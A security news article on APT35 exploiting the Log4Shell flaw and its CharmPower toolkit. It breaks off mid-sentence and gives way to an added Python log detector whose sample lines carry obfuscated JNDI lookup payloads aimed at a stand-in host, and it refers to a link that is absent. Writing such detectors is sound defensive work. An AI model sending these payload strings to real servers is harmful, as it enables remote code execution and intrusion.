Attacker group exploits Apache Log4j vulnerability


News emerged recently that an Iranian state-sponsored hacker group has been identified exploiting the Apache Log4j vulnerability to deploy a new PowerShell-based modular toolkit.

Detailed by researchers at Check Point Software Technologies, the APT35 hacker group, also known as Phosphorus and Charming Kitten, was first observed exploiting Log4j just four days after the vulnerability was publicly disclosed.

The attack setup is described as hasty, since the group used only a basic open-source JNDI exploit kit.

To gain access to a vulnerable service, the Iranian attackers used a new PowerShell-based modular framework called "CharmPower". The script is used to establish persistence, gather information and execute commands.

CharmPower has four main modules:

  • The first validates network connectivity.
  • The second gathers basic system information, such as the Windows version, the computer name and the contents of various system files.
  • The third module retrieves the command-and-control domain from a hard-coded URL hosted in an Amazon Web Services Inc. S3 bucket.
  • The fourth module receives, decrypts and executes follow-up modules.

Based on the information gathered during the initial execution, APT35 then deploys additional custom modules to facilitate data exfiltration and to hide its presence on the infected machine.

APT35 is a well-known hacker group linked to 2020 attacks against the Trump campaign, current and former U.S. government officials, journalists covering global politics, and prominent Iranians living outside Iran. The group also targeted the Munich Security Conference that same year.

"The research connecting the Log4Shell exploitation to the Iranian Charming Kitten APT coincides with, and contradicts, a report made by the U.S. Cybersecurity and Infrastructure Security Agency on January 10 suggesting that there had been no significant intrusions related to the bug at that time."

"This may highlight existing issues around incident reporting and disclosure, and the potential lag between threat actor activity and detection."

John Bambenek, principal threat hunter at technology services management company Netenrich Inc., said it is not surprising that second-tier nation-state actors seized the opportunity presented by the Log4j vulnerability so quickly.

"Any exploit this sharp will be used by anyone looking for a quick foothold, and sometimes exploitable windows like these open up, which means you have to act fast," Bambenek said. "The bigger question is which intelligence agency was using this before the vulnerability was publicly disclosed."

The Log4j flaw, known as Log4Shell and tracked as CVE-2021-44228, is a major threat because of how widely Log4j is used in enterprises and the plethora of servers and cloud-based services that could be exposed to the zero-day vulnerability. Log4j, an open-source and widely distributed Apache Software Foundation project, is a logging library, and the flaw affects versions 2.0-beta9 through 2.14.1.

Security experts have said the threat posed by Log4Shell is extremely high not only because of how widely the library is used, but also because of how easily the vulnerability can be exploited. Threat actors need only submit a string containing a malicious lookup, which Log4j parses and resolves, loading attacker-supplied code onto the server. Attackers can gain control of
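The exploitation described above leaves a recognisable trace: the attacker's string has to reach a logged field (User-Agent, a query parameter, a header) as a Log4j lookup of the form ${jndi:<scheme>://...}. Scanning logs for the literal "jndi" is not enough, because Log4j resolves nested lookups such as ${lower:j} and ${::-j} before the JNDI lookup runs, and in-the-wild probes used exactly those forms to hide the token. The following detector, an added example written for this page and not code from Check Point, the Apache project or the attackers' toolkit, normalises those obfuscation lookups the way Log4j 2.x would and only then matches the JNDI pattern. The access-log lines are constructed for the example (203.0.113.0/24 is a documentation range).

```python
import re

# Constructed Apache-style access-log lines (not captured from any real incident).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 200 30 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET /api HTTP/1.1" 200 30 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.10/d}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:13 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 30 "-" "curl/7.79"',
]

# Innermost ${...} lookups that Log4j 2.x resolves to plain text and that attackers
# use to hide the literal "jndi" token:
#   ${lower:X} / ${upper:X}        -> case-mapped X
#   ${::-X}, ${env:UNSET:-X}, ...  -> the default value X when the variable is empty or unset
_OBFUSCATED_LOOKUP = re.compile(
    r'\$\{(?:(lower|upper):([^${}]*)|[^${}]*?:-([^${}]*))\}', re.IGNORECASE)

# After normalisation a live probe reads ${jndi:<scheme>://...}. Log4j lower-cases the
# lookup prefix before dispatching it, so the match must be case-insensitive.
_JNDI_LOOKUP = re.compile(
    r'\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://[^}]*\}', re.IGNORECASE)


def _resolve(match):
    """Replace one innermost obfuscation lookup with the text Log4j would substitute."""
    kind, arg, default = match.group(1), match.group(2), match.group(3)
    if kind:
        return arg.lower() if kind.lower() == "lower" else arg.upper()
    return default


def normalize_lookups(text, max_rounds=20):
    """Collapse nested obfuscation lookups from the inside out until nothing changes.

    max_rounds bounds the work on adversarial input; 20 levels of nesting is far
    beyond anything seen in real probes.
    """
    for _ in range(max_rounds):
        resolved = _OBFUSCATED_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probe(text):
    """Return (scheme, normalized_lookup) for the first JNDI lookup in text, else None."""
    normalized = normalize_lookups(text)
    m = _JNDI_LOOKUP.search(normalized)
    if not m:
        return None
    return m.group(1).lower(), m.group(0)


def scan_log_lines(lines):
    """Return one finding per log line carrying a (possibly obfuscated) JNDI lookup."""
    findings = []
    for idx, line in enumerate(lines):
        hit = find_jndi_probe(line)
        if hit:
            scheme, lookup = hit
            findings.append({"line": idx, "scheme": scheme, "lookup": lookup})
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['scheme']:5s} {f['lookup']}")
```

Run against the constructed sample, the scanner flags the four probe lines (schemes ldap, ldap, rmi and dns) and ignores both the ordinary request and the ${date:yyyy} lookup, which is not a JNDI lookup even though it would still be resolved by a vulnerable Log4j. Treat a hit as a probe rather than a confirmed compromise: the string only executes code if it reaches a vulnerable Log4j instance with the lookup enabled, so the next step is to check whether the target host runs an affected version and whether it made an outbound LDAP, RMI or DNS connection to the host named in the lookup.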

News that Iranian attackers are exploiting the Log4j vulnerability comes as U.S. Cyber Command's Cyber National Mission Force revealed that it has identified multiple open-source tools used by Iranian intelligence agencies on networks.

The announcement relates to an Iranian state-sponsored hacker group known as "MuddyWater".

The group is linked to Iran's Ministry of Intelligence and Security and primarily targets other nations in the Middle East, and occasionally countries in Europe and North America.

If you want to know more, you can check the details at the following link.

